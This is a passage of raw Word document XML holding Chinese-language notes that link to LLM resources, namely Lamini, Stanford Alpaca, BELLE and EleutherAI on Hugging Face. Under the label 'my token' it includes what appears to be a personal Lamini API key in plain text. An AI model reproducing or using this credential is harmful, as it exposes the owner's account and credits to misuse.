        <w:t>https://lamini-ai.github.io/#installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E68539" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1491BD0B" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>获取token的地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360E0099" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>https://app.lamini.ai/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5239D0DC" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F0E7B9D" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>默认有1w的credits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A8FAE5" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>我的token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ADFA43" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0da87e3869c3dd9517c7c0f9baf1da6629e1be60</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0766925E" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0509D234" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64D1D541" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="340" w:after="330" w:line="578" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>stanford alpaca</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EEF993" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AE969DF" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778F784F" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>https://github.com/tatsu-lab/stanford_alpaca</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560768E8" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75507002" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>模型介绍</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E5F3DD" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>https://link.zhihu.com/?target=https%3A//crfm.stanford.edu/2023/03/13/alpaca.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C937EE" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43738CB6" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>在线体验</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EA07A5" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>https://link.zhihu.com/?target=https%3A//alpaca-ai-custom2.ngrok.io/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27342381" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1642C82F" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B066F05" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60DDD247" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38D8E83A" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7451CB44" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="340" w:after="330" w:line="578" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>BELLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EFD383" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>https://github.com/LianjiaTech/BELLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B91F9F9" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A2F6D77" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>代码看IDE模式（此地址是使用chatGPT辅助打分）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088779CA" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>https://github.com/LianjiaTech/BELLE/tree/main/train</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5057E684" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57332F44" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>持续开放指令训练数据、相关模型、训练代码、应用场景等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A93152" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32D60D07" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="260" w:after="260" w:line="416" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="等线 Light" w:eastAsia="等线 Light" w:hAnsi="等线 Light" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线 Light" w:eastAsia="等线 Light" w:hAnsi="等线 Light" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>论文</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BE9125" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21D31CD9" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LLaMA7B基础上增量预训练扩展中文词表的模</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B067398" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>https://huggingface.co/BelleGroup/BELLE-LLaMA-EXT-7B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018D61FE" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27F50399" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>基于多样化开源数据训练后的</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LLaMA-7B模型</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D97D281" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>https://huggingface.co/BelleGroup/BELLE-on-Open-Datasets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4473A6F8" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23D96351" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="340" w:after="330" w:line="578" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>ugging Face</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C3F17E" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29144B29" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>网站：</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>https://huggingface.co/EleutherAI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A943C50" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73DA896C" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21D6F590" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E975C92" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="340" w:after="330" w:line="578" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
